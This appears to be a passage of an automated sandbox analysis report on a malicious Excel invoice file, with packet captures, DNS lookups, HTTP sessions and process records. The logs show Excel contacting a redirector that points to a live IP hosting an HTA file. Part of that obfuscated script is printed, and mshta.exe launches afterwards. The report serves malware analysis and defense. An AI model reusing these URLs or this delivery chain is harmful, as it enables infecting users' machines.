                              Jan 16, 2025 08:32:25.989319086 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989330053 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989445925 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.989517927 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989538908 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989557981 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989569902 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989583015 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.989583969 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.989618063 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.989633083 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.990367889 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.990381002 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.990391970 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.990406036 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.990417957 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.990417957 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.990451097 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.990470886 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.991141081 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.991153955 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.991166115 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.991178036 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.991199017 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.991203070 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.991228104 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.991244078 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.992078066 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.992090940 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.992105007 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.992115974 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.992129087 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.992141962 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.992177010 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:25.994278908 CET8059105172.245.119.74192.168.2.25
                              Jan 16, 2025 08:32:25.994335890 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:26.064239025 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:26.064276934 CET5910580192.168.2.25172.245.119.74
                              Jan 16, 2025 08:32:36.529254913 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:36.529292107 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:36.529436111 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:36.530268908 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:36.530281067 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.190993071 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.191097021 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:37.192698956 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:37.192711115 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.192933083 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.193861008 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:37.235332966 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.305428028 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.305509090 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.305622101 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:37.306171894 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:37.306171894 CET59106443192.168.2.2513.107.246.45
                              Jan 16, 2025 08:32:37.306190968 CET4435910613.107.246.45192.168.2.25
                              Jan 16, 2025 08:32:37.306200981 CET4435910613.107.246.45192.168.2.25
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 16, 2025 08:31:32.449878931 CET53542311.1.1.1192.168.2.25
                              Jan 16, 2025 08:31:46.306900978 CET6060253192.168.2.251.1.1.1
                              Jan 16, 2025 08:32:20.730716944 CET5423153192.168.2.251.1.1.1
                              Jan 16, 2025 08:32:20.916552067 CET53542311.1.1.1192.168.2.25
                              Jan 16, 2025 08:32:36.519298077 CET6060253192.168.2.251.1.1.1
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jan 16, 2025 08:31:46.306900978 CET192.168.2.251.1.1.10xf8c8Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                              Jan 16, 2025 08:32:20.730716944 CET192.168.2.251.1.1.10x40d8Standard query (0)s.deemos.comA (IP address)IN (0x0001)false
                              Jan 16, 2025 08:32:36.519298077 CET192.168.2.251.1.1.10xd7c9Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 16, 2025 08:31:46.314708948 CET1.1.1.1192.168.2.250xf8c8No error (0)otelrules.svc.static.microsoftotelrules.azureedge.netCNAME (Canonical name)IN (0x0001)false
                              Jan 16, 2025 08:31:46.314708948 CET1.1.1.1192.168.2.250xf8c8No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                              Jan 16, 2025 08:31:46.314708948 CET1.1.1.1192.168.2.250xf8c8No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Jan 16, 2025 08:31:46.314708948 CET1.1.1.1192.168.2.250xf8c8No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                              Jan 16, 2025 08:32:20.916552067 CET1.1.1.1192.168.2.250x40d8No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                              Jan 16, 2025 08:32:36.528192997 CET1.1.1.1192.168.2.250xd7c9No error (0)otelrules.svc.static.microsoftotelrules.azureedge.netCNAME (Canonical name)IN (0x0001)false
                              Jan 16, 2025 08:32:36.528192997 CET1.1.1.1192.168.2.250xd7c9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Jan 16, 2025 08:32:36.528192997 CET1.1.1.1192.168.2.250xd7c9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                              • s.deemos.com
                              • otelrules.svc.static.microsoft
                              • 172.245.119.74
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.2559105172.245.119.74802568C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              Jan 16, 2025 08:32:25.414491892 CET267OUTGET /xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Connection: Keep-Alive
                              Host: 172.245.119.74
                              Jan 16, 2025 08:32:25.901004076 CET1236INHTTP/1.1 200 OK
                              Date: Thu, 16 Jan 2025 07:32:25 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Wed, 15 Jan 2025 01:31:56 GMT
                              ETag: "59501-62bb4a4a9a2f5"
                              Accept-Ranges: bytes
                              Content-Length: 365825
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/hta
                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 32 25 36 36 25 36 36 25 33 31 25 33 32 25 36 35 25 33 38 25 33 36 25 36 33 25 33 39 25 33 37 25 36 36 25 33 34 25 33 31 25 33 35 25 33 30 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                              Data Ascii: <script>...(function() { var d = unescape("%62%66%66%31%32%65%38%36%63%39%37%66%34%31%35%30%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%37%27%56%4d%34%38%63%38%5d%54%29%21%65%38%49%5c%38%72%5a%26%57%27%36%4d%34%58%65%22%0a%28%4d%31%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                              Jan 16, 2025 08:32:25.901022911 CET1236INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                              Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                              Jan 16, 2025 08:32:25.901034117 CET1236INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                              Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                              Jan 16, 2025 08:32:25.901043892 CET1236INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                              Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                              Jan 16, 2025 08:32:25.901051044 CET1236INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                              Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                              Jan 16, 2025 08:32:25.901056051 CET1236INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33
                              Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%6
                              Jan 16, 2025 08:32:25.901070118 CET776INData Raw: 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 35 64 25 32 37 25 34 64 25 35 63 25 34 38 25 33 61
                              Data Ascii: 3%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%5d%27%4d%5c%48%3a%35%58%33%28%2a%45%4a%4f%51%34%46%33%2c%5a%37%28%36%25%3a%5e%33%2c%38%32%33%5e%45%29%3b%55%37%57%3b%2b%4d%3a%48%4e%45%4c%5a%4e%4b%36%25%2d%2b%2f%3e%54%38%32%2a%5
                              Jan 16, 2025 08:32:25.901081085 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                              Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                              Jan 16, 2025 08:32:25.901094913 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                              Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                              Jan 16, 2025 08:32:25.901104927 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                              Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%
                              Jan 16, 2025 08:32:25.906265020 CET1236INData Raw: 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36 33 25 36
                              Data Ascii: 63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%63%


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.255910414.103.79.104432568C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2025-01-16 07:32:24 UTC257OUTGET /fNsCo8xA?&priesthood=tame&quotation=pretty&mall HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: s.deemos.com
                              Connection: Keep-Alive
                              2025-01-16 07:32:25 UTC458INHTTP/1.1 302 Found
                              Date: Thu, 16 Jan 2025 07:32:25 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 99
                              Connection: close
                              X-DNS-Prefetch-Control: off
                              X-Frame-Options: SAMEORIGIN
                              Strict-Transport-Security: max-age=15724800; includeSubDomains
                              X-Download-Options: noopen
                              X-Content-Type-Options: nosniff
                              X-XSS-Protection: 1; mode=block
                              Location: http://172.245.119.74/xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta
                              Vary: Accept
                              2025-01-16 07:32:25 UTC99INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 31 39 2e 37 34 2f 78 61 6d 70 70 2f 73 73 77 2f 72 65 61 6c 6c 79 6e 69 63 65 67 69 72 6c 77 69 74 68 6e 69 63 65 61 74 74 69 74 75 64 65 67 69 72 6c 66 72 69 65 6e 64 73 2e 68 74 61
                              Data Ascii: Found. Redirecting to http://172.245.119.74/xampp/ssw/reallynicegirlwithniceattitudegirlfriends.hta


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.255910613.107.246.454432568C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2025-01-16 07:32:37 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                              Host: otelrules.svc.static.microsoft
                              2025-01-16 07:32:37 UTC498INHTTP/1.1 200 OK
                              Date: Thu, 16 Jan 2025 07:32:37 GMT
                              Content-Type: text/xml
                              Content-Length: 461
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                              ETag: "0x8DD04C77BDE7614"
                              x-ms-request-id: 976e2c7f-701e-0097-59cc-67b8c1000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20250116T073237Z-15fdc555dffvnhjvhC1EWRd1cg000000019g0000000010qz
                              x-fd-int-roxy-purgeid: 0
                              X-Cache-Info: L2_T2
                              X-Cache: TCP_REMOTE_HIT
                              Accept-Ranges: bytes
                              2025-01-16 07:32:37 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:02:31:28
                              Start date:16/01/2025
                              Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Imagebase:0x7ff6c9560000
                              File size:70'082'712 bytes
                              MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:8
                              Start time:02:32:25
                              Start date:16/01/2025
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                              Imagebase:0x7ff6393c0000
                              File size:32'768 bytes
                              MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:9
                              Start time:02:32:30
                              Start date:16/01/2025
                              Path:C:\Windows\splwow64.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\splwow64.exe 12288
                              Imagebase:0x7ff6facc0000
                              File size:192'512 bytes
                              MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:12
                              Start time:02:32:50
                              Start date:16/01/2025
                              Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Invoice#T5O2025.xls"
                              Imagebase:0x7ff6c9560000
                              File size:70'082'712 bytes
                              MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Call Graph

                              • Entrypoint
                              • Decryption Function
                              • Executed
                              • Not Executed
                              • Show Help
                              callgraph 1 Error: Graph is empty

                              Module: Sheet1

                              Declaration
                              LineContent
                              1

                              Attribute VB_Name = "Sheet1"

                              2

                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                              3

                              Attribute VB_GlobalNameSpace = False

                              4

                              Attribute VB_Creatable = False

                              5

                              Attribute VB_PredeclaredId = True

                              6

                              Attribute VB_Exposed = True

                              7

                              Attribute VB_TemplateDerived = False

                              8

                              Attribute VB_Customizable = True

                              Module: Sheet2

                              Declaration
                              LineContent
                              1

                              Attribute VB_Name = "Sheet2"

                              2

                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                              3

                              Attribute VB_GlobalNameSpace = False

                              4

                              Attribute VB_Creatable = False

                              5

                              Attribute VB_PredeclaredId = True

                              6

                              Attribute VB_Exposed = True

                              7

                              Attribute VB_TemplateDerived = False

                              8

                              Attribute VB_Customizable = True

                              Module: Sheet3

                              Declaration
                              LineContent
                              1

                              Attribute VB_Name = "Sheet3"

                              2

                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                              3

                              Attribute VB_GlobalNameSpace = False

                              4

                              Attribute VB_Creatable = False

                              5

                              Attribute VB_PredeclaredId = True

                              6

                              Attribute VB_Exposed = True

                              7

                              Attribute VB_TemplateDerived = False

                              8

                              Attribute VB_Customizable = True

                              Module: ThisWorkbook

                              Declaration
                              LineContent
                              1

                              Attribute VB_Name = "ThisWorkbook"

                              2

                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                              3

                              Attribute VB_GlobalNameSpace = False

                              4

                              Attribute VB_Creatable = False

                              5

                              Attribute VB_PredeclaredId = True

                              6

                              Attribute VB_Exposed = True

                              7

                              Attribute VB_TemplateDerived = False

                              8

                              Attribute VB_Customizable = True

                              Reset < >